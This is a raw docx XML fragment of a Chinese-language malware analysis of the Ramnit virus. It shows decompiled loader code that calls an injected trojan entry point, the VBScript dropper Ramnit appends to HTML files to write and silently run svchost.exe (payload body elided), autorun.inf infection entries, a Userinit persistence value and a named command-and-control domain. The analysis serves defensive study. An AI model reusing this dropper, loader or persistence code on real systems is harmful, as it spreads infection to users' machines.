        <w:t xml:space="preserve">  if ( injectdata &amp;&amp; injectdata-&gt;FixImportTable(0, injectdata-&gt;ImageBase, injectdata-&gt;ImageSize, injectdata) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    secnum = *(_WORD *)(*(_DWORD *)(injectdata-&gt;ImageBase + 60) + injectdata-&gt;ImageBase + 6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    secheaders = (IMAGE_SECTION_HEADER *)(*(_WORD *)(*(_DWORD *)(injectdata-&gt;ImageBase + 60) + injectdata-&gt;ImageBase + 20)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">                                        + *(_DWORD *)(injectdata-&gt;ImageBase + 60)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">                                        + injectdata-&gt;ImageBase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                        + 24);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    if ( *(_WORD *)(*(_DWORD *)(injectdata-&gt;ImageBase + 60) + injectdata-&gt;ImageBase + 6) )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        v4 = secnum;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        v5 = injectdata-&gt;SetSegProperty(secheaders-&gt;Characteristics);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        v10 = secheaders-&gt;VirtualAddress + injectdata-&gt;ImageBase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        v9 = secheaders-&gt;Misc.PhysicalAddress;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        ((void (__stdcall *)(signed int, DWORD *, DWORD *, int, char *))injectdata-&gt;ZwProtectVirtualMemory)(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">          -1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">          &amp;v10,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">          &amp;v9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">          v5,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">          &amp;v11);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        ++secheaders;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">        secnum = v4 - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      while ( v4 != 1 );</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ((void (__stdcall *)(int, signed int, char *))injectdata-&gt;ImageEntry)(</w:t>
      </w:r>
      <w:r w:rsidR="0068380C">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0068380C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidR="00E22DBC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的木马入口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      injectdata-&gt;ImageBase,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">      injectdata-&gt;ImagePath);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    v7 = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    v8 = 0x80000000;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">    ((void (__stdcall *)(_DWORD, int *))injectdata-&gt;ZwDelayExecution)(0, &amp;v7);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:r>
        <w:t xml:space="preserve">  __writeeflags(v6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="007B4DDD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4DDD" w:rsidRDefault="007B4DDD" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00523628" w:rsidRDefault="00C8171D" w:rsidP="00C817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PE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00853013" w:rsidRDefault="00C8171D" w:rsidP="005251B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744C6DBE" wp14:editId="53E84D35">
            <wp:extent cx="4804914" cy="256552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885" cy="25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3" w:rsidRDefault="00853013" w:rsidP="00820C36">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面的一切努力最后发现重点在于内嵌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逻辑中</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:t>直接</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>winhex</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00820C36" w:rsidRPr="00820C36">
        <w:t>404031</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:t>xD000</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大小的内嵌</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取出，</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:t>结果</w:t>
      </w:r>
      <w:r w:rsidR="00820C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>52k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00855E33" w:rsidRDefault="00855E33" w:rsidP="00820C36">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00855E33" w:rsidRDefault="00855E33" w:rsidP="00820C36">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00853013" w:rsidRDefault="00853013" w:rsidP="00853013">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc467351367"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>内嵌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="005B08B5" w:rsidRDefault="005B08B5" w:rsidP="005A12C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D744A97" wp14:editId="2CCA9C05">
            <wp:extent cx="6840220" cy="48120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60" w:rsidRDefault="00CF1760" w:rsidP="00855E33">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF1760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这次</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经可以分析出来了，说明是最终形态，搜索一些敏感的字符串可知是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ramnit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1760">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>病毒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF7439" w:rsidRDefault="009E4B67" w:rsidP="00855E33">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="009E4B67">
        <w:t>http://www.lavasoft.com/mylavasoft/malware-descriptions/blog/viruswin32ramnita</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00855E33" w:rsidRDefault="00855E33" w:rsidP="00855E33">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现网上</w:t>
      </w:r>
      <w:r w:rsidR="005E2802">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已有分析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没有继续分析，</w:t>
      </w:r>
      <w:r>
        <w:t>不过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述加密手段还有很多学习之处</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E04C7" w:rsidRDefault="001E04C7" w:rsidP="00855E33">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染全盘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>改写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点，</w:t>
      </w:r>
      <w:r>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.rmnet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于存储恶意木马</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html htm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下脚本，</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在用户</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%TEMP%</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件夹中植入了一个名为“</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”的二进制文件并执行关联的</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控件，受感染的用户主机会试图连接到与</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ramnit</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的一个木马控制服务器——</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fget-career.com</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如下两图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>&lt;SCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Language=VBScript&gt;&lt;!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>DropFileName = "svchost.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>WriteData = "4D5A... (binary virus body)"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Set FSO = CreateObject("Scripting.FileSystemObject")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>DropPath = FSO.GetSpecialFolder(2) &amp; "\" &amp; DropFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>If</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>FSO.FileExists(DropPath)=False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Set FileObj = FSO.CreateTextFile(DropPath, True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>For i = 1 To Len(WriteData) Step 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>FileObj.Write Chr(CLng("&amp;H" &amp; Mid(WriteData,i,2)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>FileObj.Close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set WSHshell = CreateObject("WScript.Shell")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>WSHshell.Run DropPath, 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>//--&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="00855E33">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>autorun.inf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[autorun]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action=Open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icon=</w:t>
      </w:r>
      <w:r>
        <w:t>%WinDir%\system32\shell32.dll,4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shellexecu</w:t>
      </w:r>
      <w:r>
        <w:t>te=\RECYCLER\S-&lt;ID&gt;\&lt;rnd_2&gt;.exe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shell\explore\comma</w:t>
      </w:r>
      <w:r>
        <w:t>nd=\RECYCLER\S-&lt;ID&gt;\&lt;rnd_2&gt;.exe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USEAUTOPLAY=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>shell\Open\command=\RECYCLER\S-&lt;ID&gt;\&lt;rnd_2&gt;.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染移动存储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&lt;infected volume name&gt;:\Recycler\</w:t>
      </w:r>
      <w:r>
        <w:t>S-&lt;ID&gt;\&lt;rnd_1&gt;.cpl (3584 bytes)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>&lt;infected volume name&gt;:\Recycler\S</w:t>
      </w:r>
      <w:r>
        <w:t>-&lt;ID&gt;\&lt;rnd_2&gt;.exe (56832 bytes)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 xml:space="preserve">&lt;infected volume name&gt;:\Copy of </w:t>
      </w:r>
      <w:r>
        <w:t>Shortcut to (1).lnk (691 bytes)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 xml:space="preserve">&lt;infected volume name&gt;:\Copy of </w:t>
      </w:r>
      <w:r>
        <w:t>Shortcut to (2).lnk (722 bytes)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 xml:space="preserve">&lt;infected volume name&gt;:\Copy of </w:t>
      </w:r>
      <w:r>
        <w:t>Shortcut to (3).lnk (858 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;infected volume name&gt;:\Copy of </w:t>
      </w:r>
      <w:r>
        <w:t>Shortcut to (4).lnk (867 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210" w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;infected volume name&gt;:\autorun.inf (11964 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E4B67" w:rsidRDefault="009E4B67" w:rsidP="009E4B67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册启动项</w:t>
      </w:r>
      <w:r w:rsidRPr="009E4B67">
        <w:t>"Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009E4B67" w:rsidSect="005D394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B38B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71380EAA"/>
